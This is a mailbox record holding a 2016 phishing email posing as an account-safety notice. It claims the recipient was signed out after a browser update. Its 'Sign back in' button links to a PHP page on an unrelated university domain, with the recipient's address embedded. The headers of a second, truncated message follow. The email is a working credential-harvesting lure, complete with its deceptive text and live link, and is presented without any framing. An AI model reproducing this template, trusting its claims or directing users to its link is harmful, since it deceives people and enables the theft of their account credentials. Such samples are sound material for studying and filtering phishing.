From: "Account Notifier" <google@gator3112.hostgator.com>
Date: Fri, 11 Mar 2016 08:05:13 -0800
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 130

You will not see this in a MIME-aware mail reader.
--===============0226639928==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  =

    =

    =

   =

 Dear User
 =

   =

We noticed your default browser in which your mail box , email was logged i=
n, has recently updated. =


For safety reasons we have temporary signed you out. =


 =

   Sign back in and continue your usage =


 =

   =

No further action is necessary; this is just a notification for your accoun=
t safety, just follow the above link and Sign Back and Continue your free u=
sage. =

   =

Have a great day! =


Mail Notification Team.  =

   =

 =

   =



 Replies sent to this email address cannot be answered.=20
--===============0226639928==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV id=3Dyui_3_16_0_1_1406113582341_2157>
<DIV id=3Dyui_3_16_0_1_1406113582341_2156>
<TABLE id=3Dyui_3_16_0_1_1406113582341_2296 style=3D"TABLE-LAYOUT: fixed" c=
ellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D#ffffff>
<TBODY id=3Dyui_3_16_0_1_1406113582341_2295>
<TR id=3Dyui_3_16_0_1_1406113582341_2294>
<TD id=3Dyui_3_16_0_1_1406113582341_2293 style=3D"MIN-WIDTH: 500px" vAlign=
=3Dtop align=3Dmiddle>
<TABLE id=3Dyui_3_16_0_1_1406113582341_2292 cellSpacing=3D0 cellPadding=3D0=
 width=3D500 bgColor=3D#f4f3f8>
<TBODY id=3Dyui_3_16_0_1_1406113582341_2291>
<TR id=3Dyui_3_16_0_1_1406113582341_2290>
<TD id=3Dyui_3_16_0_1_1406113582341_2289>
<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 23px" height=3D23><IMG style=3D"BORDER-RIGHT: 0px=
; BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" he=
ight=3D1 width=3D1></TD></TR></TBODY></TABLE>
<DIV class=3Dyiv5113620829m1930 id=3Dyui_3_16_0_1_1406113582341_2288 style=
=3D"PADDING-RIGHT: 30px; PADDING-LEFT: 19px; FONT-SIZE: 17px; COLOR: #46495=
8; LINE-HEIGHT: 21px; FONT-FAMILY: Helvetica, Verdana, Arial, sans-serif">D=
ear User<BR>
<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 14px" height=3D14><IMG style=3D"BORDER-RIGHT: 0px=
; BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" he=
ight=3D1 width=3D1></TD></TR></TBODY></TABLE>We noticed your default browse=
r in which your mail box , <B id=3Dyui_3_16_0_1_1406113582341_2297>email</B=
> was logged in, has recently updated. <BR><BR>For safety reasons we have t=
emporary signed you out. <BR><BR>
<TABLE width=3D"100%">
<TBODY>
<TR align=3Dleft bgColor=3D#000099>
<TD style=3D"PADDING-RIGHT: 20px; MIN-WIDTH: 10px; PADDING-LEFT: 20px; PADD=
ING-BOTTOM: 5px; PADDING-TOP: 2px; BACKGROUND-COLOR: #000099; TEXT-ALIGN: c=
enter" width=3D518 height=3D48><A style=3D"FONT-WEIGHT: 300; FONT-SIZE: 17p=
x; COLOR: #fff; FONT-FAMILY: 'Segoe UI Semibold', 'Segoe UI Bold', 'Segoe U=
I', 'Helvetica Neue Medium', Arial, sans-serif; LETTER-SPACING: 0.02em; TEX=
T-ALIGN: center; TEXT-DECORATION: none" href=3D"http://www.oceanica.ufrj.br=
/mbs//images/jdownloads/screenshots/order/others/m.i.php?rand=3D13InboxLigh=
taspxn.1774256418&amp;fid.4.1252899642&amp;fid=3D1&amp;fav.1&amp;rand.13Inb=
oxLight.aspxn.1774256418&amp;fid.1252899642&amp;fid.1&amp;fav.1&amp;usernam=
e=3Djose@monkey.org&amp;username1=3D&amp;.rand=3D13InboxLight.aspx?n=3D1774=
256418&amp;fid=3D4#n=3D1252899642&amp;fid=3D1&amp;fav=3D1">Sign back in and=
 continue your usage </A></TD></TR></TBODY></TABLE><BR>
<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 14px" height=3D14><IMG style=3D"BORDER-RIGHT: 0px=
; BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" he=
ight=3D1 width=3D1></TD></TR></TBODY></TABLE>No further action is necessary=
; this is just a notification for your account safety, just follow the abov=
e link and Sign Back and Continue your free usage. =

<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 14px" height=3D14><IMG style=3D"BORDER-RIGHT: 0px=
; BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" he=
ight=3D1 width=3D1></TD></TR></TBODY></TABLE>Have a great day! <BR><BR>Mail=
 Notification Team. </DIV>
<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 24px" height=3D24><IMG style=3D"BORDER-RIGHT: 0px=
; BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" he=
ight=3D1 width=3D1></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 bgColor=3D#687080>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1px" height=3D1><IMG style=3D"BORDER-RIGHT: 0px; =
BORDER-TOP: 0px; DISPLAY: block; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" heig=
ht=3D1 width=3D1></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD><=
/TR></TBODY></TABLE><BR><BR>
<DIV style=3D"FONT-SIZE: 13px; COLOR: #333333; LINE-HEIGHT: 18px; FONT-FAMI=
LY: Helvetica, sans-serif" align=3Dcenter>Replies sent to this email addres=
s cannot be answered. </DIV></DIV></DIV></BODY></HTML>
--===============0226639928==--

From jose@monkey.org Thu Mar 24 03:55:12 2016 +0000
Return-Path: service@2co.com
Delivered-To: jose@monkey.org
X-FDA: 71327213664.02.turn06_66f1fe5ef231a
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 82,5.5,0,8d5d3f763a08fed0,d41d8cd98f00b204,service@2co.com,:,RULES_HIT:2:41:46:72:150:153:327:355:379:455:677:871:962:967:969:973:983:988:989:994:1000:1001:1026:1189:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1571:1573:1575:1588:1589:1594:1710:1730:1744:1747:1764:1777:1792:1803:1823:2107:2194:2198:2199:2200:2376:2393:2525:2527:2538:2539:2568:2610:2682:2685:2693:2731:2790:2792:2859:2890:2892:2897:2898:2909:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3024:3043:3138:3139:3140:3141:3142:3352:3392:3865:3867:3868:3870:3871:3872:3873:3874:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:3991:3995:4000:4042:4051:4321:4507:4509:6261:6354:6506:6678:6703:6747:6748:7281:7398:7903:7909:7940:8518:8550:8568:8603:8957:9025:9074:9898:10004:10265:10394:11026:11473:11529:11604:11639:11658:11914:11984:12043:12050:12051:12260:12438:12555:12740:12963:13110:13141:13149:13158:13228:13230:13374:13439:14096:14659:21080:30001:30003
X-HE-Tag: turn06_66f1fe5ef231a
X-Filterd-Recvd-Size: 45926
Received: from s195.webhostingserver.nl (h1-sp08.webhostingserver.nl [195.211.72.113])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 24 Mar 2016 03:55:07 +0000 (UTC)
Received: from loadbalance01.mail.antagonist.nl ([141.138.168.72] helo=proxy05.mail.antagonist.nl)
	by s195.webhostingserver.nl with esmtp (Exim 4.86.2)
	(envelope-from <service@2co.com>)
	id 1aiwMU-002anH-Gp
	for jose@monkey.org; Thu, 24 Mar 2016 04:55:06 +0100
